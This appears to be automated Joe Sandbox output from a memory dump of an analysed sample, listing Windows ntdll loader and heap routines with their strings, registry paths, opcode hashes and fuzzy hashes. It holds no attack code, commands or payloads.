                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0356c127f186df716b53763d59bc626812958d42589c928f1dd803b10fa33c9c
                                                                                  • Instruction ID: e397366dbff7fb1f8e22fcdf0dbd83fd338c161377bd46c47c8cb7c5283c35ad
                                                                                  • Opcode Fuzzy Hash: 0356c127f186df716b53763d59bc626812958d42589c928f1dd803b10fa33c9c
                                                                                  • Instruction Fuzzy Hash: 3A90027161510416D5006159461470A100547D0201F62C926E0514968ECBAA895575A2

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 4 37712eb0-37712ebc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: b78b81ff6d7238337b10c78201f640204640e516fde6f0f22d5c811f19075154
                                                                                  • Instruction ID: 89f92280eb41f0280c1ba35869f4dc13a3138ef2db51710ef50ca59775d9cc71
                                                                                  • Opcode Fuzzy Hash: b78b81ff6d7238337b10c78201f640204640e516fde6f0f22d5c811f19075154
                                                                                  • Instruction Fuzzy Hash: D390027121140416D5006159491470F000547D0302F52C526E1254955ECA3A88557571

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 3 37712d10-37712d1c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 9deff29507e26b2f3fba158cd52c2487e340ace7a0c6bfc41620a9357d119d9b
                                                                                  • Instruction ID: 456d2dff9b6d329848446b425d79c0d2024caf5ccaa553208ce7895b022b623f
                                                                                  • Opcode Fuzzy Hash: 9deff29507e26b2f3fba158cd52c2487e340ace7a0c6bfc41620a9357d119d9b
                                                                                  • Instruction Fuzzy Hash: 6890027121100427D5116159460470B000947D0241F92C927E0514958EDA6B8956B121

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2 37712bc0-37712bcc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0cc54716e8d6e0d8cd5e09f442e1116a9f98bca024a2e56dfd2c78a43e5d206e
                                                                                  • Instruction ID: 06d95dbafbe29c9f788a8e00737313b44879720a4f15b47c8ab6f24e17bb8df9
                                                                                  • Opcode Fuzzy Hash: 0cc54716e8d6e0d8cd5e09f442e1116a9f98bca024a2e56dfd2c78a43e5d206e
                                                                                  • Instruction Fuzzy Hash: 6A90027121100416D5006599550874A000547E0301F52D526E5114955FCA7A88957131

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1 37712b90-37712b9c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 5f7283cb9e8c2945ed839ab28d782ba8e69fcd91c0465febcd403295ffdc5e50
                                                                                  • Instruction ID: ffe93bb31bbfcbb6d76268bdafec0d48ceb30a07b744b57e42774f17840d4673
                                                                                  • Opcode Fuzzy Hash: 5f7283cb9e8c2945ed839ab28d782ba8e69fcd91c0465febcd403295ffdc5e50
                                                                                  • Instruction Fuzzy Hash: BF90027121108816D5106159850474E000547D0301F56C926E4514A58ECAAA88957121

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 37712a80-37712a8c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: a5bbdd7a012f9584d6762b84773f80e213251ef671e21c3d79d36d7f42706994
                                                                                  • Instruction ID: 79e5e672a29897c2846bdff003fcb248c1c669f21b7dda7d1b1ce33e30d2047a
                                                                                  • Opcode Fuzzy Hash: a5bbdd7a012f9584d6762b84773f80e213251ef671e21c3d79d36d7f42706994
                                                                                  • Instruction Fuzzy Hash: A89002A12120001745057159451471A400A47E0201B52C536E1104990EC93A88957125
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2160512332
                                                                                  • Opcode ID: 402d1d3c1e9985f84c64e2c59532c51a885d1cb6a542e8b07f86ec6a36044cc2
                                                                                  • Instruction ID: 2e5d6d4f7fb1ca0d606c1ca1daf9407896fd40038574a89516a3e87653efc1f7
                                                                                  • Opcode Fuzzy Hash: 402d1d3c1e9985f84c64e2c59532c51a885d1cb6a542e8b07f86ec6a36044cc2
                                                                                  • Instruction Fuzzy Hash: 01927BB5604341ABE721CF20C890B6BB7E9FB88764F044D2DFA94DB250DB74E844CB96

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: $ $0
                                                                                  • API String ID: 3446177414-3352262554
                                                                                  • Opcode ID: eb3186bdc2f3c13e548b327767d905de9d688f799ff7283fdb96e311f8c3a874
                                                                                  • Instruction ID: 1ecc9ffb7fe8c95847f8d8ae1d09fe5b3ffaade531b82ab3fdfec40eb1d4d063
                                                                                  • Opcode Fuzzy Hash: eb3186bdc2f3c13e548b327767d905de9d688f799ff7283fdb96e311f8c3a874
                                                                                  • Instruction Fuzzy Hash: 353223B16093818FE750CF68C884B6BBBE5BF88354F44492EF5998B290D774E948CF52
                                                                                  Strings
                                                                                  • @, xrefs: 37775DF7
                                                                                  • @, xrefs: 37775BA7
                                                                                  • @, xrefs: 37775F20
                                                                                  • Control Panel\Desktop, xrefs: 37775CDE
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 37775B61
                                                                                  • @, xrefs: 37775FFA
                                                                                  • LanguageConfiguration, xrefs: 37775FA0
                                                                                  • PreferredUILanguagesPending, xrefs: 37775D52
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 37775EDD
                                                                                  • @, xrefs: 37775D30
                                                                                  • PreferredUILanguages, xrefs: 37775F51
                                                                                  • InstallLanguageFallback, xrefs: 37775BD0
                                                                                  • LanguageConfigurationPending, xrefs: 37775DA1
                                                                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 37775604
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                  • API String ID: 0-1325123933
                                                                                  • Opcode ID: 454cf4c0dbec93c5fd6b3fb2e76d662c4bdb5c14a6ced178262645fdb2f684ae
                                                                                  • Instruction ID: 78025498a16a77f3d1a1181d75b306982b6d7f254270574b51f473bd84e0defb
                                                                                  • Opcode Fuzzy Hash: 454cf4c0dbec93c5fd6b3fb2e76d662c4bdb5c14a6ced178262645fdb2f684ae
                                                                                  • Instruction Fuzzy Hash: FA7228B55083819BD760CF24C850B7BB7EAAF88794F404D2DF999DB250EB34E905CB92

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                  • API String ID: 3446177414-1700792311
                                                                                  • Opcode ID: 46936660ef05baa7d418de99e795bd86ef461725faf37f0dd00117de7ad9f697
                                                                                  • Instruction ID: 58f27a29e23f91168771bf8c68589493230f20ae7eca490d9972ad9c062e10aa
                                                                                  • Opcode Fuzzy Hash: 46936660ef05baa7d418de99e795bd86ef461725faf37f0dd00117de7ad9f697
                                                                                  • Instruction Fuzzy Hash: 35D1013550078AEFDB01CFA4C452AADBBF2FF4A720F048489E455AF612C739E942CB16
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.o7
                                                                                  • API String ID: 0-73794551
                                                                                  • Opcode ID: 307cf8a3e00451c8033ba8c458fa298efa61d39745ee4b4708407a5dca6a4460
                                                                                  • Instruction ID: 07917fc371939a9be847681b003b7548de0b36aa7426a25681de8673ffe38ae2
                                                                                  • Opcode Fuzzy Hash: 307cf8a3e00451c8033ba8c458fa298efa61d39745ee4b4708407a5dca6a4460
                                                                                  • Instruction Fuzzy Hash: 1BB18CB55083429FD711CE24C4A0B5FB7E8EB84768F41492EF998EB241D734D908CB97
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                  • API String ID: 3446177414-1745908468
                                                                                  • Opcode ID: 87de82ccf6aa449bdf06388dc28ade51d38f41f8809f52ccacdef6ac0fea679e
                                                                                  • Instruction ID: 9351fae73d7122c52ca9d771632a0d62f88d19ce19674e77c5bb4758a3cfb7e3
                                                                                  • Opcode Fuzzy Hash: 87de82ccf6aa449bdf06388dc28ade51d38f41f8809f52ccacdef6ac0fea679e
                                                                                  • Instruction Fuzzy Hash: 5B911175900685DFDF01CFA4C550AADBBF2FF49320F04889AE465AF252CB39A953CB16
                                                                                  Strings
                                                                                  • @, xrefs: 376CD24F
                                                                                  • @, xrefs: 376CD09D
                                                                                  • h.o7, xrefs: 3772A5D2
                                                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 376CD136
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 376CD263
                                                                                  • @, xrefs: 376CD2B3
                                                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 376CD0E6
                                                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 376CD202
                                                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 376CD06F
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.o7
                                                                                  • API String ID: 0-3452320649
                                                                                  • Opcode ID: c31f1067cdfb6492c1ef25c688fa05fa0ec048795596f0ac3ceb7f83368071f8
                                                                                  • Instruction ID: 48f1ee1bb1b6e5bf7f763247cacdae051e81a3bfd0edfaec46e6754ce5ee909e
                                                                                  • Opcode Fuzzy Hash: c31f1067cdfb6492c1ef25c688fa05fa0ec048795596f0ac3ceb7f83368071f8
                                                                                  • Instruction Fuzzy Hash: 5EA16DB15083469FE321CF25C494B5BB7E8FB84765F01492EF998AA241E778D908CF93
                                                                                  APIs
                                                                                  • RtlDebugPrintTimes.NTDLL ref: 376FD879
                                                                                    • Part of subcall function 376D4779: RtlDebugPrintTimes.NTDLL ref: 376D4817
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 3446177414-1975516107
                                                                                  • Opcode ID: 11a48fb3bf3df8ea0104723143912c7ec31f005e43c9b1cc996eb266f3c3bb5c
                                                                                  • Instruction ID: 486fd4fa87c4bbd83746b082a0c2ba6e117c3817c1a3d2aefd39910dcd0a0c79
                                                                                  • Opcode Fuzzy Hash: 11a48fb3bf3df8ea0104723143912c7ec31f005e43c9b1cc996eb266f3c3bb5c
                                                                                  • Instruction Fuzzy Hash: 6A51ED75A04346DFEB04CFA4C5A579EBBF1BF48364F604159C410BB282D77AA892CB92
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                  • API String ID: 0-2224505338
                                                                                  • Opcode ID: 01ee90c8ff631ef5440e61c303055700ff95be6a9459c867eeaaf317b563d276
                                                                                  • Instruction ID: 91a534bd203a4cbb784bf4cf101b604dab9fe1cc5d16544727f4f22a4c807da8
                                                                                  • Opcode Fuzzy Hash: 01ee90c8ff631ef5440e61c303055700ff95be6a9459c867eeaaf317b563d276
                                                                                  • Instruction Fuzzy Hash: F1514736211285EFDB01CF54CAA4F2AB3B9EF05A74F148899F415DF222CA35ED02DE56
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-523794902
                                                                                  • Opcode ID: 0481f425b113456d0a7ef0ae363d3df1356832e0ffe44dc0004fe67a30133260
                                                                                  • Instruction ID: 82a49bb431edd481d132ad3cd00ae62055e4bcdb93f1bab900b5f63eb4b36e31
                                                                                  • Opcode Fuzzy Hash: 0481f425b113456d0a7ef0ae363d3df1356832e0ffe44dc0004fe67a30133260
                                                                                  • Instruction Fuzzy Hash: 08422F76204382DFD305CF24C4A4B6ABBEAFF88654F0449ADE4A5CB351DB38E945CB52
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.o7
                                                                                  • API String ID: 0-3704603521
                                                                                  • Opcode ID: 307de3a2f14591b1035b78573a2b17a41f24f16e464681deae7df0299cc3f479
                                                                                  • Instruction ID: 38abec534e0cde7505da4527b28bd2d81c319578be2b6114d5640a7f4c981502
                                                                                  • Opcode Fuzzy Hash: 307de3a2f14591b1035b78573a2b17a41f24f16e464681deae7df0299cc3f479
                                                                                  • Instruction Fuzzy Hash: 5AF151B6D01219EFDB01CF98C9A4ADEBBB9FF48750F51406AE401EB211E7759E01CBA1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                  • API String ID: 0-122214566
                                                                                  • Opcode ID: 113708d90220d08ef8c460c01a050719f02c1d2f05472795055892b55b77216f
                                                                                  • Instruction ID: 0639f486c1b5cf7f5f1695e5359a61bb44cb97f1729458f889fa4bd022a112ee
                                                                                  • Opcode Fuzzy Hash: 113708d90220d08ef8c460c01a050719f02c1d2f05472795055892b55b77216f
                                                                                  • Instruction Fuzzy Hash: 09C17771A033159FEB058B64C9A1FBE77A9AF05360F10406DE8059FA91EB74DC44CBB2
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-4253913091
                                                                                  • Opcode ID: 596a0a223fe33ade6a1bd36e7cd01acdb5fabdde7d5c8d5d76f51180cc303310
                                                                                  • Instruction ID: f7e751c004ffe38a7a3c9f041adc9da922b31f19559895e42e2fc4b8fb024324
                                                                                  • Opcode Fuzzy Hash: 596a0a223fe33ade6a1bd36e7cd01acdb5fabdde7d5c8d5d76f51180cc303310
                                                                                  • Instruction Fuzzy Hash: 78F1DF74602A0ADFEB05CF64C9A4B6AB7BAFF44350F2445A8E4059F781D734E981CFA1
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                  • API String ID: 3446177414-2283098728
                                                                                  • Opcode ID: c9b9601401501611523757b10e175e718925ef3c9d8bdce8f78baf99a305621f
                                                                                  • Instruction ID: 4fa873d93e5b1d2a978715de9d1d8cfc7440fc7d758ef45063894b452481713e
                                                                                  • Opcode Fuzzy Hash: c9b9601401501611523757b10e175e718925ef3c9d8bdce8f78baf99a305621f
                                                                                  • Instruction Fuzzy Hash: 6C5100716007029BE720DF38C8A4B2977A5BB89724F141A6DE461DB691DB7AE804CB93
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  • Opcode ID: 475edec1a0adb28f3e93ad826340c499275b24eb2092822e3044f923d70aa069
                                                                                  • Instruction ID: 6ed0b115c5a68195de4e52a60a8bb817d754b6112002e72d2ba228d8dd25f64c
                                                                                  • Opcode Fuzzy Hash: 475edec1a0adb28f3e93ad826340c499275b24eb2092822e3044f923d70aa069
                                                                                  • Instruction Fuzzy Hash: 56F11772E006518FEB48CF68C8E567EFBF6AF88210B16466ED456DF394D634E901CB50
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                  • API String ID: 0-3061284088
                                                                                  • Opcode ID: 843f10c42e584cf74235e590148a922954865ed983b62e81d12470ed56f78164
                                                                                  • Instruction ID: 83c8bab72a279b544a84000313ac25cdc287f47917ddc793e0c758932616d209
                                                                                  • Opcode Fuzzy Hash: 843f10c42e584cf74235e590148a922954865ed983b62e81d12470ed56f78164
                                                                                  • Instruction Fuzzy Hash: 0A017077054241AED305C328D479F527BACDB42B30F1948DDE4044F591CA58DC50F956
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LUj7$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                  • API String ID: 0-2549709445
                                                                                  • Opcode ID: e59d7d6c255e41f6f055d4dc415eb15d36f51007ae50a8911ea40017daf586c7
                                                                                  • Instruction ID: 38da2c8385b8c00cabbc6cd92fc9dfa9f7ccd686a8d634e45722afbc6b5083a5
                                                                                  • Opcode Fuzzy Hash: e59d7d6c255e41f6f055d4dc415eb15d36f51007ae50a8911ea40017daf586c7
                                                                                  • Instruction Fuzzy Hash: 6DB17AB5A12744CFEB24CE65C8A0BADB3B6AF48758F15492DE425EB792D730A8408F41
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}k7
                                                                                  • API String ID: 0-2525425493
                                                                                  • Opcode ID: 5a7bee72e9374e7f0cf134185b3f9b0600b2eea56079f290a3e00408cd37ff47
                                                                                  • Instruction ID: ea937bae986be914b2d8852155bfae9ebbd4587816d8d2c5fe6691b9fffdcc0c
                                                                                  • Opcode Fuzzy Hash: 5a7bee72e9374e7f0cf134185b3f9b0600b2eea56079f290a3e00408cd37ff47
                                                                                  • Instruction Fuzzy Hash: F8817E75609340AFE311CB25C848B6ABBE9EF88764F40096DFD849F295DB74ED04CB62
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LUj7$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                  • API String ID: 0-34927157
                                                                                  • Opcode ID: b2cf916098de5b6cbe3800d10502e3a1eb0ea924f64bf03a96d65d84e93c5721
                                                                                  • Instruction ID: e44e7a45190802cc04438f685db00630fbbfef6aadab92e6914863df227e58c7
                                                                                  • Opcode Fuzzy Hash: b2cf916098de5b6cbe3800d10502e3a1eb0ea924f64bf03a96d65d84e93c5721
                                                                                  • Instruction Fuzzy Hash: 1E91FF75A15309CFEB21CF64C4607ADB7B1EF04364F14459AE808AB395D778AE80CF91
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                  • API String ID: 0-2586055223
                                                                                  • Opcode ID: cb40c96f8b9abfba48f1bd0ab7d75a0e49c80be096fc107513ac6de75b74b1b0
                                                                                  • Instruction ID: 5e17e6fdbc146c4d4c89446b1765fe9ad56a20af88afb76cf81bbbdfb2b69b0a
                                                                                  • Opcode Fuzzy Hash: cb40c96f8b9abfba48f1bd0ab7d75a0e49c80be096fc107513ac6de75b74b1b0
                                                                                  • Instruction Fuzzy Hash: F2614776204781EFE311CB65C858F6777EDEF89B60F0408A9F9649B291C778E840DB62
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                  • API String ID: 2994545307-1391187441
                                                                                  • Opcode ID: d85174cfd160c704956fc04ae7088b6dd05fd0bcef5430597a79aa1922c19b6b
                                                                                  • Instruction ID: f24f611e9d259d3c74fea0ed864a4713a24a1ea7bc9957994285e271ee060372
                                                                                  • Opcode Fuzzy Hash: d85174cfd160c704956fc04ae7088b6dd05fd0bcef5430597a79aa1922c19b6b
                                                                                  • Instruction Fuzzy Hash: 0A31E676900205EFDB11CB54CC98F9AB7B8EF45770F1440A9E418AB2A1EB34ED40DFA2
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$ep7
                                                                                  • API String ID: 0-1970619473
                                                                                  • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                  • Instruction ID: c6b523f11b45bf27451108b27eec8601f2fbe6e9b16b741295d7e5f8268623ed
                                                                                  • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                  • Instruction Fuzzy Hash: 1E317172A00619FBDB11CB94CC54EEEBBBDEB84760F004465F915AF260EB34DA05DBA1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                                  • API String ID: 0-1880532218
                                                                                  • Opcode ID: 9023df3ba845d5ef7cdf8488e55b0c1c2f7432a8e27ef05e3a95afd92afd4957
                                                                                  • Instruction ID: f9b7463b841b78c8be76f85df64414972ba590ec38ed07170fe873d08cecbd72
                                                                                  • Opcode Fuzzy Hash: 9023df3ba845d5ef7cdf8488e55b0c1c2f7432a8e27ef05e3a95afd92afd4957
                                                                                  • Instruction Fuzzy Hash: 6421687AE01200ABD7158B58DC41B9AB7F6EF45765F044569E806AF341EB34DE06CB41
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  • Opcode ID: 1bf6790120c162d35963a0a8172905ba4897cf987c061a7715631b287d75360a
